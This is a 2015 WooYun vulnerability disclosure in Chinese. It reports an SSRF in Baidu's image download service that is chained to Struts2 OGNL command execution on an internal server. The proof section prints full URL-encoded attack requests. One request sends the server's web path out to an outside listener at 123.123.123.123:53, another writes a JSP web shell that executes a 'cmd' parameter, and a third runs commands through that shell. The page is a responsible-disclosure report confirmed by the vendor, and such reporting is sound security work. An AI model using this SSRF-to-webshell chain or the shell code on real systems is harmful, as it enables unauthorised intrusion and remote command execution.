当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100037

漏洞标题:百度某个从SSRF到内网WebShell之2

相关厂商:百度

漏洞作者: loopx9

提交时间:2015-03-07 17:41

修复时间:2015-04-21 17:42

公开时间:2015-04-21 17:42

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-07: 细节已通知厂商并且等待厂商处理中
2015-03-09: 厂商已经确认,细节仅向厂商公开
2015-03-19: 细节向核心白帽子及相关领域专家公开
2015-03-29: 细节向普通白帽子公开
2015-04-08: 细节向实习白帽子公开
2015-04-21: 细节向公众公开

简要描述:

某处存在SSRF.

详细说明:

百度图片下载服务存在SSRF:

http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=图片url

还支持302跳转,对url的检查好像只是看是否以图片的后缀结尾,我们使用#号hash可绕过检查。

http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://www.qq.com/

直接请求http://www.qq.com/没有数据返回,url末尾添加#p.jpg:

GET /i?tn=download&word=download&ie=utf8&fr=news&url=http://www.qq.com/%23p.jpg HTTP/1.1
Host: image.baidu.com
Connection: close

qq.png


直通内网:

http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://family.baidu.com%23p.jpg
http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://erp.baidu.com%23p.jpg
http://image.baidu.com/i?tn=download&word=download&ie=utf8&fr=news&url=http://security.baidu.com%23p.jpg

sec.png

漏洞证明:

简单扫了一下就发现了一个内网系统存在st2命令执行:

http://172.19.239.29:8080/login.action

尝试写shell:

GET /i?tn=download&word=download&ie=utf8&fr=news&url=http://172.19.239.29:8080/login.action?redirect:${%2527http%253a//123.123.123.123%253a53/%2527%252b(%2523context.get(%2527com.opensymphony.xwork2.dispatcher.HttpServletRequest%2527).getRealPath(%2522/%2522))}%23p.jpg HTTP/1.1
Host: image.baidu.com
Connection: close

因为SSRF支持302跳转,我们在123.123.123.123上监听53端口接收来自image.baidu.com的请求:

53.png

得到web路径,写shell:

GET /i?tn=download&word=download&ie=utf8&fr=news&url=http://172.19.239.29:8080/login.action?redirect:${(new%2520java.io.PrintWriter(%2522D:/tomcat-zcgl-server8080/webapps/ROOT/test.jsp%2522)).append(%2527%253C%2525%2540%2520page%2520import%253D%2522java.io.*%2522%2520%2525%253E%2520%253C%2525%2520String%2520cmd%2520%253D%2520request.getParameter(%2522cmd%2522)%253B%2520String%2520output%2520%253D%2520%2522%2522%253B%2520if(cmd%2520!%253D%2520null)%2520%257B%2520String%2520s%2520%253D%2520null%253B%2520try%2520%257B%2520Process%2520p%2520%253D%2520Runtime.getRuntime().exec(cmd)%253B%2520BufferedReader%2520sI%2520%253D%2520new%2520BufferedReader(new%2520InputStreamReader(p.getInputStream()))%253B%2520while((s%2520%253D%2520sI.readLine())%2520!%253D%2520null)%2520%257B%2520output%2520%252B%253D%2520s%2520%252B%2522%255C%255Cr%255C%255Cn%2522%253B%2520%257D%2520%257D%2520catch(IOException%2520e)%2520%257B%2520e.printStackTrace()%253B%2520%257D%2520%257D%2520%2525%253E%2520%2520%253C%2525%253Doutput%2520%2525%253E%2520%2527).close()}%23p.jpg HTTP/1.1
Host: image.baidu.com
Connection: close

shell地址:http://172.19.239.29:8080/test.jsp

GET /i?tn=download&word=download&ie=utf8&fr=news&url=http://172.19.239.29:8080/test.jsp%3fcmd=whoami%23p.jpg HTTP/1.1
Host: image.baidu.com
Connection: close

whoami.png


ipconfig /all:

ipconfig.png


xwork版本:

struts.png

修复方案:

*—_—*

版权声明:转载请注明来源 loopx9@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-03-09 13:15

厂商回复:

感谢提交,已通知业务部门处理

最新状态:

暂无